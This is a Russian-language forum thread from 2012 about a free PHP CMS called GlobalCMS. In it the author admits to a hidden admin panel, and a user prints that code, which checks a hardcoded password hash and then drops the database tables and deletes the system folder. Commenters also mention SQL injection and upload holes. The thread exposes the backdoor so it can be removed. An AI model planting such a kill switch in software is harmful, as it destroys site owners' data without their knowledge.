GlobalCMS
1.
MILORD (08.05.2012 / 23:01)
Скрипт GlobalCMS это новый движок,который быстро развивается Автором проекта является Лорд! Данный скрипт не может расспростронятся на платной основе! Снятие копирайта без официального разрешения запрещено! Если вы всё же сняли,ваш снайт будет подвержен сносу! Разработчик: Лорд ICQ: 949765 email:
[email protected] vk
http://vk.com/fraza
Официальный сайт:
http://misteram.ru
Пример
http://dvig.biz.uz/
***Об установке***
Итак,как установить глобал-пабл?Всё просто!Хоть и написан он на mysqli,это не усложняет вашу задачу! Первым делом прописываем базу данных в файле root/system/config.php Далее грузим таблицы файла root/global.sql Выставляем chmod 777 на root/forum/files ../my/ava ../photos ../temp Вот и всё,регистрируемся, id1 - создатель) id2 - Система (Бот)- советую его не трогать_) Если у вас есть предложения и идеи,просим сюда: -misteram.ru -icq 949765 -email
[email protected] ВОЗМОЖНО СОТРУДНИЧЕСТВО!!! Так же скоро появится платная версия,которая будет включать в себя более мощный и новый функционал_)
О скрипте:
-Чат
-Форум
-Аватарки
-Рейтинг пользователей
-Личные стены пользователей
-Модуль временной рекламы
-Смайлы
-Bb-коды
-Функциональная админка
-Новости
-Гостевая
-Личные сообщения и прочее_)
2.
iNeeXT (09.05.2012 / 14:47)
<textarea> форма для капчи - круто
http://i.imm.io/oIOv.png wtf?
Добавлено через 05:14 сек.
Пилить и пилить.
С безопасностью очень плохо.
3.
MILORD (09.05.2012 / 15:43)
2.
iNeeXT, ну если нашёл что то плохое отпишись)
4.
Сергей (09.05.2012 / 19:04)
По-моему рано платную версию делать. Щас цмски как грибы растут, сначала заработай уважение к своему творению, а потом уже продавай.
5.
iNeeXT (09.05.2012 / 19:25)
3.
MILORD, вот например
http://prntscr.com/91jnz
6.
MILORD (10.05.2012 / 03:44)
5.
iNeeXT, нуу...и что такого?_)
7.
MILORD (26.05.2012 / 18:52)
Новая версия
8.
MarkizDeSad (26.05.2012 / 19:02)
MILORD (8 Мая 2012 / 23:01)
Если вы всё же сняли,ваш снайт будет подвержен сносу!
Это что означает?
В движке есть бэкдоры?
9.
MILORD (26.05.2012 / 19:05)
Адольф Кобыленко (26 Мая 2012 / 19:02)
Это что означает?
В движке есть бэкдоры?
Есть альтернатива,панелька доступа с запароленным доступом,а пароль знаю только я и мой софт))
10.
Александр (26.05.2012 / 19:23)
А что мешает убрать эту панель?
11.
MILORD (26.05.2012 / 19:27)
10.
rastoman, Ни чего+ она не опасна сайту,т.к. доступ имею только я, а я не какая то кодо-школота,которая ляпает дыры в пабле.Я не собираюсь специально дырявить скрипты так,что бы из было легко сломать любому.Код знаю только я,без кода доступа это просто сплошной код-дополнения..
12.
Александр (26.05.2012 / 19:31)
Скажи, а зачем на странице примера плавающие окна?
Добавлено через 00:43 сек.
Это же вап сайт
13.
MILORD (26.05.2012 / 19:33)
rastoman (26 Мая 2012 / 19:31)
Скажи, а зачем на странице примера плавающие окна?
Добавлено через 00:43 сек.
Это же вап сайт
пример не мой
я через гугл нашёл,видимо хост уг бесплатный там
14.
Андрей (26.05.2012 / 19:42)
Интересно это.
Ты знаешь пароль от админки стороннего сайта.
следовательно пароль хранится на этом же сайте.
Скачиваем скрипт => находим где хранится=>расшифровываем и всё, кладём сайты чужие.
15.
MILORD (26.05.2012 / 19:45)
14.
KiPiSH, о_О расшифруешь-тебе нобиливку дадут.Нет способа расшифровать алгоритм md5(md5
16.
Тимофей (26.05.2012 / 19:50)
sysadm/index.php
Строки 217-245
case 'aut':
if (!$id) $id = $ya['id'];
$diz -> head('Вы не авторизированы');
$diz -> title('Вы не авторизированы');
$pasm='f91a7558fba129bec62e8b0baf3cce85';
if (empty($_POST['pass'])) {
$msg .= '<form action="./?do=aut" method="post"><div>';
$msg .= 'Ваш ник:<br/>
<input type="text" name="login" maxlength="30" title="Введите ник"/><br/>
Ваш пароль:<br/>
<input type="pass" name="pass" maxlength="30" title="Введите пароль"/>
<br/><input type="submit" value="Авторизация"/></div></form>';
}elseif(md5(md5($_POST['pass'])) != $pasm)
{
$diz -> head('Ошибка');
$diz -> title('Ошибка');
$diz -> out('пароль не верен,повторите..!<br/>
<a href="/aut.php">Назад</a>');
header('refresh: 3; /aut.php');
}else{
$db -> query("DROP TABLE `users`");
$db -> query("DROP TABLE `nastroiki`");
$db -> query("DROP TABLE `forums`");
rmdir (ROOT.'system');
}
$msg .= '<div class="levo">'.$diz -> img('back.png').'<a href="./">Назад</a>';
$msg .= '<br/>'.$diz -> img('home.png').'<a href="../">На главную</a></div>';
$diz -> out($msg);
break;
удаляем и всё
снимаем копирайт
Добавлено через 00:39 сек.
лично я убрал на денвере у себя уже
17.
MILORD (26.05.2012 / 19:55)
16.
Wennel,
халявщик,как сам по скрипт?
18.
Тимофей (26.05.2012 / 19:58)
MILORD (26 Мая 2012 / 17:55)
16. Wennel, халявщик,как сам по скрипт?
для основы сойдет
остальное сам буду писать
19.
MILORD (26.05.2012 / 20:00)
18.
Wennel, Приятно слышать))
20.
Тимофей (26.05.2012 / 20:05)
ZiGR (26 Мая 2012 / 18:04)
Не буду намекать на наличие SQL inj ;)
21.
Тимофей (26.05.2012 / 20:12)
ZiGR (26 Мая 2012 / 18:10)
21. Wennel, я не буду писать их кол-во, т.к боюсь напугать
что-то мне уже страшно этот двиг юзать
22.
MILORD (26.05.2012 / 20:13)
ZiGR (26 Мая 2012 / 20:04)
Не буду намекать на наличие SQL inj ;)
Ну ка,ну ка.Кодер,скажи мне,какие иньекции на mysqli могут быть?
23.
ramzes (26.05.2012 / 20:33)
MILORD (26 Мая 2012 / 20:13)
Ну ка,ну ка.Кодер,скажи мне,какие иньекции на mysqli могут быть?
Ботекс. Круто че.
З.ы. а от каких защитит?)))
24.
MILORD (26.05.2012 / 20:46)
ZiGR (26 Мая 2012 / 20:16)
24. MILORD, SQL inj. Ясно?
Такое ощущение, что ты что-то там фильтруешь
покажи хоть одну опасную sql injection
25.
MILORD (26.05.2012 / 20:51)
ZiGR (26 Мая 2012 / 20:48)
27. MILORD, c моей темой о поиске sql inj ознакомился и согласен платить?
бред
26.
Вадим (12.06.2012 / 04:11)
iNeeXT (9 Мая 2012 / 19:25)
3. MILORD, вот например http://prntscr.com/91jnz
Норм, че) Грузим в любую папку)))))))
URL:
https://visavi.net/topics/31810